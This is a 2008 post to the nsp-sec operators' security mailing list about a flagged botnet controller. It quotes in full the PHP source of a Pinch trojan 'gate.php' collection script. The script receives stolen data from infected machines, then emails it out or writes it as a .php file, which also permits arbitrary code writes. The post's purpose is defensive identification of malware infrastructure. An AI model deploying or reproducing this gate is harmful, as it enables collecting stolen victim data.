[nsp-sec] 212.43.241.106 in the daily reports

David Freedman david.freedman at uk.clara.net
Mon Feb 25 10:16:18 EST 2008


Tom, see attached diff:


Tom Fischer wrote:
> Hi,
>
> On Mon, Feb 25, 2008 at 11:51:04AM +0000, David Freedman wrote:
>> ~ Your daily reports flagged 212.43.241.106 as a botnet controller with
>> the URL http://www.winfleet.fr/fr/gate.php,
>
> does this gate.php look like the attached Pinch gate.php?
>
>
>
> ------------------------------------------------------------------------
>
> <?
> //CFG
> $mode = 1; 		//1.Send to e-mail, 2.Save to file, 3.E-mail+file
> $rndatch = FALSE;	//Random reports names
> $savetodir = TRUE;	//Save rerorts to changed directory	
> $dirname = "load";	//Directory name
>
> // a - recepient
> // b - subject
> // c - message body
> // d - file name(not *.php)
>
> //Getting data
> $ip=getenv("REMOTE_ADDR");
> $email=$_POST['a'];
> $subject=$_POST['b']."(".$ip.")";
> $msg = str_replace(" ","+",$_POST['c']);
> $var = $_POST['d'];
>
>
> //Storing || Sending data
> //via E-Mail
> IF($mode == 1 || $mode == 3){
>
>   IF($rndatch){
>     $array = range('a','z');
>     $c=count($array);
>     $var = $array[rand(1,$c)] . $array[rand(1,$c)] . $array[rand(1,$c)] . $array[rand(1,$c)] . rand(0,9) . rand(0,9) . ".bin";
>   };
>
>   $headers = "Content-Type: application/octet-stream; name=\"".$var."\"\n";
>   $headers.= "Content-Transfer-Encoding: base64\n";
>   $headers.= "Content-Disposition: attachment; filename=\"".$var."\"\n";
>   mail($email, $subject, $msg, $headers);
> };
>
> //via File
> IF($mode == 2 || $mode == 3){
>
> //To dir
>  IF($savetodir){
>  // @mkdir($dirname);
>   @chdir($dirname);
>  }
>
>   //$vartype=substr($var,-3,3);
>  // IF($vartype == "php")
>  $var.=".rep";
>
>    $filename = $ip.".php";
>
>   $fp=fopen($filename,'w');
>   fwrite($fp, base64_decode($msg));
>   fclose($fp);
> };
> ?>
>
> <title>ret_ok</title>


--
David Freedman
Group Network Engineering
Claranet Limited
http://www.clara.net
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: gate.diff.txt
URL: <https://puck.nether.net/mailman/private/nsp-security/attachments/20080225/ed7f056f/attachment-0001.txt>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 254 bytes
Desc: OpenPGP digital signature
URL: <https://puck.nether.net/mailman/private/nsp-security/attachments/20080225/ed7f056f/attachment-0001.sig>
